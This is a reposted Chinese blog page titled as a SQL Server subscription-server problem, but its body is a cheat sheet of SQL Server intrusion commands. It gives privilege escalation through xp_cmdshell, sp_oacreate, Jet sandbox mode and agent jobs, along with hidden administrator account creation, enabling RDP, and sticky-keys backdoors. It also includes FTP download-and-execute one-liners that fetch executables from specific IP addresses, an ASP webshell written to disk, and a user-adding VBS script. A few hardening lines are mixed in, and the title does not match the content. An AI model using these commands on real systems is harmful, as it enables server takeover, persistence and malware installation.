SQL Server搜索不到订阅服务器

转载
云中谁寄锦书来 2024-11-07 15:11:10
文章标签 SQL Server搜索不到订阅服务器信息与通信 php sql mysql 文章分类 SQL Server 数据库
xp_cmdshell提权命令： net user SQLDebugger list /add net localgroup administrators SQLDebugger /add
xp_oacreate提权命令： declare @shell int  exec sp_oacreate 'wscript.shell',@shell output  exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user alice  123  /add'--
沙盒提权： exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0; Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")'); Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")'); 
job提权：先启动agent服务 exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' 添加一个job用于执行cmd命令： use msdb  exec sp_delete_job NULL,'x'  exec sp_add_job 'x'  exec sp_add_jobstep NULL,'x',NULL,1,'CMDEXEC','cmd /c dir c:\ > c:\a.txt' exec sp_add_jobserver NULL,'x',@@servername  exec sp_start_job 'x' 通过bulk查看a.txt结果： drop table [clee] CREATE TABLE [clee](ResultTxt nvarchar(1024) NULL) BULK INSERT [clee] FROM 'c:\a.txt' WITH (KEEPNULLS) insert into [clee] values ('g_over'); Alter Table [clee] add id int NOT NULL IDENTITY (1,1) select * from [clee] 
启用xp_cmdshell: EXEC sp_configure 'show advanced options', 1 --  RECONFIGURE WITH OVERRIDE --  EXEC sp_configure 'xp_cmdshell', 1 --  RECONFIGURE WITH OVERRIDE --  EXEC sp_configure   'show advanced options', 0 -- 
启用Ad Hoc Distributed Queries: exec sp_configure 'show advanced options',1 reconfigure exec sp_configure 'Ad Hoc Distributed Queries',1 reconfigure
启用sp_OACreate： exec sp_configure 'show advanced options',1; RECONFIGURE; exec sp_configure 'Ole Automation Procedures',1; RECONFIGURE;
基于xplog70.dll恢复xp_cmdshell： exec sp_dropextendedproc 'xp_cmdshell' dbcc addextendedproc ('xp_cmdshell','xplog70.dll') 基于odsole70.dll恢复sp_oacreate： drop procedure sp_oacreate dbcc addextendedproc ('sp_oacreate','odsole70.dll') 基于xpstar.dll恢复沙盒： dbcc addextendedproc ('xp_regwrite','xpstar.dll') exec xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',1
开3389： exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--  
关3389： exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;  
查看3389端口 exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Error Message:未能找到存储过程 'master..xp_cmdshell'。
修复法：很通用的，其实碰到 其他126 127的都可以一起修复，
除了xplog70.dll其他的都可以用这命令修复
xp_cmdshell新的恢复办法  第一步先删除： drop procedure sp_addextendedproc  drop procedure sp_oacreate  exec sp_dropextendedproc 'xp_cmdshell'  服务器: 消息 3701，级别 11，状态 5，行 1 无法 除去 过程 'sp_addextendedproc'，因为它在系统目录中不存在。 服务器: 消息 3701，级别 11，状态 5，过程 sp_dropextendedproc，行 18 无法 除去 过程 'xp_cmdshell'，因为它在系统目录中不存在。 第二步恢复： dbcc addextendedproc ("sp_oacreate","odsole70.dll")  dbcc addextendedproc ("xp_cmdshell","xplog70.dll")  直接恢复，不管sp_addextendedproc是不是存在 
 xplog70.dll修复：
Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。
修复XPLOG70.DLL（先用文件查看下备份的目录下\x86\bin,然后把下面目录替换）
第一步 exec sp_dropextendedproc 'xp_cmdshell' 第二步 dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
 未能找到存储过程 'master..xp_cmdshell'。 第一步: create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call
*/ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO
第二步: EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
 SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息，请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 
;EXEC sp_configure 'show advanced options', 1 --  ;RECONFIGURE WITH OVERRIDE --  ;EXEC sp_configure 'xp_cmdshell', 1 --  ;RECONFIGURE WITH OVERRIDE --  ;EXEC sp_configure   'show advanced options', 0 -- 
 删除sql危险存储：  DROP PROCEDURE sp_makewebtask  exec master..sp_dropextendedproc xp_cmdshell  exec master..sp_dropextendedproc xp_dirtree  exec master..sp_dropextendedproc xp_fileexist  exec master..sp_dropextendedproc xp_terminate_process  exec master..sp_dropextendedproc sp_oamethod  exec master..sp_dropextendedproc sp_oacreate  exec master..sp_dropextendedproc xp_regaddmultistring  exec master..sp_dropextendedproc xp_regdeletekey  exec master..sp_dropextendedproc xp_regdeletevalue  exec master..sp_dropextendedproc xp_regenumkeys  exec master..sp_dropextendedproc xp_regenumvalues  exec master..sp_dropextendedproc sp_add_job  exec master..sp_dropextendedproc sp_addtask  exec master..sp_dropextendedproc xp_regread  exec master..sp_dropextendedproc xp_regwrite  exec master..sp_dropextendedproc xp_readwebtask  exec master..sp_dropextendedproc xp_makewebtask  exec master..sp_dropextendedproc xp_regremovemultistring  exec master..sp_dropextendedproc sp_OACreate  DROP PROCEDURE sp_addextendedproc 
 恢复扩展存储过程的办法  先恢复sp_addextendedproc，语句如下：  第一： create procedure sp_addextendedproc --- 1996/08/30 20:13  @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as  set implicit_transactions off  if @@trancount > 0    begin  raiserror(15002,-1,-1,'sp_addextendedproc')    return (1)    end  dbcc addextendedproc( @functname, @dllname)    return (0) -- sp_addextendedproc  GO 
第二：  use master    exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'    exec sp_addextendedproc xp_dirtree,'xpstar.dll'    exec sp_addextendedproc xp_enumgroups,'xplog70.dll'    exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'    exec sp_addextendedproc xp_loginconfig,'xplog70.dll'    exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'    exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'    exec sp_addextendedproc sp_OACreate,'odsole70.dll'    exec sp_addextendedproc sp_OADestroy,'odsole70.dll'    exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'    exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'    exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'    exec sp_addextendedproc sp_OAStop,'odsole70.dll'    exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'    exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'    exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'    exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'    exec sp_addextendedproc xp_regread,'xpstar.dll'    exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'    exec sp_addextendedproc xp_regwrite,'xpstar.dll'    exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
 删除扩展存储过过程xp_cmdshell的语句:  exec sp_dropextendedproc 'xp_cmdshell' 
 恢复cmdshell的sql语句  exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 
开启cmdshell的sql语句  exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 
判断存储扩展是否存在  select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'  返回结果为1就ok 
恢复xp_cmdshell  exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'  返回结果为1就ok  否则上传xplog7.0.dll  exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll' 
 堵上cmdshell的sql语句  sp_dropextendedproc "xp_cmdshell 
 一.更改sa口令方法： 用sql综合利用工具连接后，执行命令： exec sp_password NULL,'新密码','sa' (提示：慎用!)
 二.简单修补sa弱口令.
方法1:查询分离器连接后执行： if exists (select * from  dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and  OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO 然后按F5键命令执行完毕
 方法2:查询分离器连接后 第一步执行：use master  第二步执行：sp_dropextendedproc 'xp_cmdshell'  然后按F5键命令执行完毕
无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。） 恢复方法：查询分离器连接后, 第一步执行：sp_dropextendedproc "xp_cmdshell" 第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 恢复方法：查询分离器连接后, 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'             然后按F5键命令执行完毕
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, 2000servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
xp或2003server系统: 126错误！命令
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
 C:\>DIR C:\ SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息，请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
分析器执行的语句：
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
 有时候用查询分离器连接执行以上语句的时候会出现找不到存储过程 sp_addextendedproc
解决方法:
create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,'sp_addextendedproc') return (1) end dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO 这段代码贴入查询分离器,执行
资源管理器： c:\windows\explorer.exe
 查看目录 exec master.dbo.xp_subdirs 'c:\'  列出磁盘 exec master..xp_fixeddrives 
 xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行） 直接加帐号！
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")'); Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows Registry Editor Version 5.00 >3389.reg  echo. >>3389.reg  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg  echo "Enabled"="0" >>3389.reg  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg  echo "ShutdownWithoutLogon"="0" >>3389.reg  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg  echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg  echo "TSEnabled"=dword:00000001 >>3389.reg  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg  echo "Start"=dword:00000002 >>3389.reg  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg  echo "Start"=dword:00000002 >>3389.reg  echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg  echo "Hotkey"="1" >>3389.reg  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg  echo "PortNumber"=dword:00000D3D >>3389.reg  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg  echo "PortNumber"=dword:00000D3D >>3389.reg  regedit /s 3389.reg
开3389：
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--  
 关3389：
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;  
查看3389端口
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
 查看系统版本 type c:\boot.ini 
 普通CMD后门 xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
 建立用户1-这里默认用户是Reconditeness密码9527可自行修改 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")')
 win2K直接上PS马 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP直接上PS马 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5下shift后门命令 declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out  exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out  exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX为你要执行的命令
写入注册表指定的键里指定的值)，使用方法(在键HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue写入bbb)： 
EXEC master..xp_regwrite 
@rootkey='HKEY_LOCAL_MACHINE', 
@key='SOFTWARE\aaa', 
@value_name='aaaValue', 
@type='REG_SZ', 
@value='bbb' 
 @echo open 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo get gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe&gzn.exe&gzn.exe
 先copy ftp.exe 到wmpub目录里 @echo cd c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
开3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
 C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL写一句话 exec master.dbo.xp_subdirs 'd:\web\cdlxkj';  exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
SA沙盒模式提权----- ---------------------- exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0; ------------------------------------------------------- Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")'); ------------------------------------------------------- Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389   SHIFT
用上的语句: 入侵 EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE', @value_name='Debugger', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe' 
恢复 EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE', @value_name='Debugger', @type='REG_SZ', @value=''
 映象劫持
EXEC master..xp_regwrite ---这是注册表编辑! @rootkey='HKEY_LOCAL_MACHINE', ---这是位置! @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',  -----这也是位置! @value_name='Debugger',  ---这是表名! @type='REG_SZ',        ---这里是写入的意思! @value='C:\WINDOWS\explorer.exe'   ----这里是写入内容!
整个过程是利用master..xp_regwrite这组件来完成的,
1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',  'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
 sql写文件
declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo ' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) ' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
 无NET提权的脚本
struser=wscript.arguments(0) strpass=wscript.arguments(1)
set lp=createObject("WSCRIPT.NETWORK")  oz="WinNT://"&lp.ComputerName  Set ob=GetObject(oz)  Set oe=GetObject(oz&"/Administrators,group")  Set od=ob.create("user",struser)  od.SetPassword strpass  od.SetInfo  Set of=GetObject(oz&"/" & struser & ",user")  oe.Add(of.ADsPath) 
For Each admin in oe.Members if struser=admin.Name then Wscript.echo struser & " 建立成功!" wscript.quit end if Next
Wscript.echo struser & " 用户建立失败!" 将以上保存为user.VBS文件 然后执行：cscript user.vbs 用户名 密码
本文章为转载内容，我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题，欢迎原作者联系我们进行内容更正或删除文章。